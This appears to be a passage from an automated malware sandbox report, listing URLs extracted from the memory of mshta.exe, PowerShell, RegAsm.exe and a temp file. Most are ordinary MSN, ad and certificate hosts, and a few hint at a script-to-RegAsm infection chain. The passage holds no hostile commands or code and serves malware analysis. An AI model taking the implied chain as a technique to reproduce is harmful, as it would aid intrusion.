                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: powershell.exe, 00000007.00000002.439981649.0000000012331000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
                    Source: mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001CA42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461593714.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C1B3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C197000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C181000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001CA42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461593714.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C181000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                    Source: mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001CA42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461593714.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C1B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                    Source: mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001CA42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461593714.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C197000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                    Source: mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001C9D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.470841965.000000001A788000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461593714.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495129914.000000001AD0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                    Source: mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001CA42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461593714.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C1B3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C197000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                    Source: mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001CA42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C197000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
                    Source: powershell.exe, 0000000E.00000002.448752677.0000000002AFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.488158083.0000000002B48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
                    Source: powershell.exe, 00000019.00000002.487987684.000000001C516000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.dmtf.or
                    Source: powershell.exe, 00000007.00000002.433523996.0000000002301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.479554107.00000000022F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.448752677.0000000002351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.473447172.0000000002381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.498084239.0000000002300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.488158083.00000000023A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
                    Source: mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001CA42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C197000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                    Source: mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001CA42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461593714.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C1B3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C197000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                    Source: RegAsm.exe, RegAsm.exe, 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                    Source: RegAsm.exe, RegAsm.exe, 00000016.00000002.462029727.0000000001F59000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
